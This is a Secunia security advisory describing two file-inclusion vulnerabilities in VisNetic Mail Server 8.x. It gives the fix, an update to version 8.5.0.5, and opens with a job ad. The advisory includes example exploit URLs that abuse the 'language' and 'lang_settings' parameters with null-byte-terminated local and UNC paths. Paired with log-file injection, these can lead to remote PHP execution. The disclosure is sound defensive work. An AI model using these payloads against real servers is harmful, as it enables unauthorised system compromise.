---------------------------------------------------------------------- Hardcore Disassembler / Reverse Engineer Wanted! Want to work with IDA and BinDiff? Want to write PoC's and Exploits? Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation compensation package. http://secunia.com/hardcore_disassembler_and_reverse_engineer/ ---------------------------------------------------------------------- TITLE: VisNetic Mail Server Two File Inclusion Vulnerabilities SECUNIA ADVISORY ID: SA18966 VERIFY ADVISORY: http://secunia.com/advisories/18966/ CRITICAL: Highly critical IMPACT: Exposure of sensitive information, System access WHERE: >From remote SOFTWARE: VisNetic Mail Server 8.x http://secunia.com/product/5610/ DESCRIPTION: Secunia Research has discovered two vulnerabilities in VisNetic Mail Server, which can be exploited by malicious users and by malicious people to disclose potentially sensitive information and to compromise a vulnerable system. 1) Input passed to the "language" and "lang_settings" parameters in "/accounts/inc/include.php" and "/admin/inc/include.php" isn't properly sanitised by the "securepath()" function before being used to include files. This can be exploited to include arbitrary files from local resources on the Windows platform using full pathnames. This can be further exploited to execute arbitrary PHP code by injecting the code into the mail server's log file and including it. Example: http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=c:\[file]%00 The vulnerability is related to #1 in: SA17865 Successful exploitation allows execution of arbitrary PHP code on a vulnerable server without requiring authentication. 2) Input passed to the "language" parameter in "/mail/settings.html" isn't properly validated before being saved to the database. This can be exploited in conjunction with overwrite of the "lang_settings" variable, which isn't properly sanitised by the "validatefolder()" function, to include arbitrary files from local resources using full pathnames, and from remote Windows shared folders using UNC pathnames. Examples: http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;c:\[file]%00; http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00; Successful exploitation allows execution of arbitrary PHP code on a vulnerable server but requires a valid logon. The vulnerability is related to #3 in: SA17865 The vulnerabilities have been confirmed in version 8.3.5. Prior versions may also be affected. SOLUTION: Update to version 8.5.0.5. PROVIDED AND/OR DISCOVERED BY: Tan Chew Keong, Secunia Research. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2006-14/advisory/ OTHER REFERENCES: SA17865: http://secunia.com/advisories/17865/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------